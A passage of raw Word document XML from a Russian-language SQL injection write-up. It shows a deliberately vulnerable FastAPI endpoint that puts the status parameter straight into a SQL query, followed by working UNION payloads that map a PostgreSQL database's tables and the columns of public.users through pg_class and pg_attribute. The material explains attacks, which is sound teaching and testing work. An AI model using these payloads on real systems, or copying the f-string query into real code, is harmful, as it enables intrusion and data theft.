          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — таблицы/view/индексы/последовательности в этих схемах, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — колонки этих таблиц с типами. SELECT на них по умолчанию выдан </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — любая аутентифицированная роль читает их свободно, даже если у неё нет права читать конечные пользовательские таблицы. Через инъекцию в SELECT-эндпоинт атакующий тремя UNION-запросами получает полную карту БД: перечень схем, имена таблиц приложения и точные имена/типы колонок для подбора последующих UNION-инъекций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A88D595" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E768CA4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># app/api/v1/orders.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24FE75C7"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50F9130E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E5CF006"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4E71249E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6596A6C6"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5F88F0EA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="238F2BEF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>router = APIRouter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46952B04" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A02552" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C4B813" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/orders")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D658FD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def list_orders(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3420C292" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    status: str,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D51AA7"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56C5AAC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) -&gt; list[dict]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DF68CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC4651B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        f"SELECT id, customer, total FROM orders WHERE status = '{status}'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42676E1D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F815F2"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0C6E9C5D"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0A715F26" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Конкатенация </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>status</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> напрямую в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text()</w:t>
      </w:r>
      <w:r>
        <w:t>. Три колонки в SELECT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numeric</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — атакующему нужно подобрать UNION с совместимыми типами. Для метаданных всё подгоняется к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5BF398" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — список таблиц во всех схемах</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="749CF04C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `status`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43BB8AE5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, n.nspname || '.' || c.relname, 0 FROM pg_class c JOIN pg_namespace n ON c.relnamespace = n.oid WHERE c.relkind = 'r' AND n.nspname NOT IN ('pg_catalog', 'information_schema') --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CCC53A1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B0F233" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, customer, total FROM orders WHERE status = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40485689" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 0, n.nspname || '.' || c.relname, 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322C8E9A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM pg_class c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="726772B3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JOIN pg_namespace n ON c.relnamespace = n.oid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A8252E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE c.relkind = 'r'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EA71BC5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND n.nspname NOT IN ('pg_catalog', 'information_schema') --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE1280A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">В колонке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>customer</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP-ответа атакующий получает все пользовательские таблицы в формате </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>schema.table</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public.orders</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public.users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>audit.events</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>analytics.user_clicks</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и т.п. Фильтр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>relkind = 'r'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> оставляет только обычные таблицы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>v</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = view, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = index, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = sequence, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = materialized view, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> = foreign table — добавляются </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">по мере необходимости). Исключение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> отрезает 300+ системных таблиц-шумов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C9C872" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — колонки конкретной таблицы (с типами)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731B9BD2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">После Payload A атакующий выбрал цель — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public.users</w:t>
      </w:r>
      <w:r>
        <w:t>. Теперь нужны имена и типы колонок для подбора UNION-payload-а на эту таблицу.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0535C266" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload (подставляется вместо `status`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6F8750" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT a.attnum, a.attname, 0 FROM pg_attribute a WHERE a.attrelid = 'public.users'::regclass AND a.attnum &gt; 0 AND NOT a.attisdropped --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A6F41C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EFAD50" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, customer, total FROM orders WHERE status = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D8B96B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT a.attnum, a.attname, 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4E122A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM pg_attribute a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1BBC5D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE a.attrelid = 'public.users'::regclass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6515ECDC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND a.attnum &gt; 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152CB327" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND NOT a.attisdropped --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE1A2FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Возвращается список колонок таблицы </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public.users</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в порядке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>attnum</w:t>
      </w:r>
      <w:r>
        <w:t>. С типами:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6136396B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT a.attnum, a.attname || ':' || format_type(a.atttypid, a.atttypmod), 0 FROM pg_attribute a WHERE a.attrelid = 'public.users'::regclass AND a.attnum &gt; 0 AND NOT a.attisdropped --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7845AD96" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Условие </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a.attnum &gt; 0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> отсекает системные псевдо-колонки (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
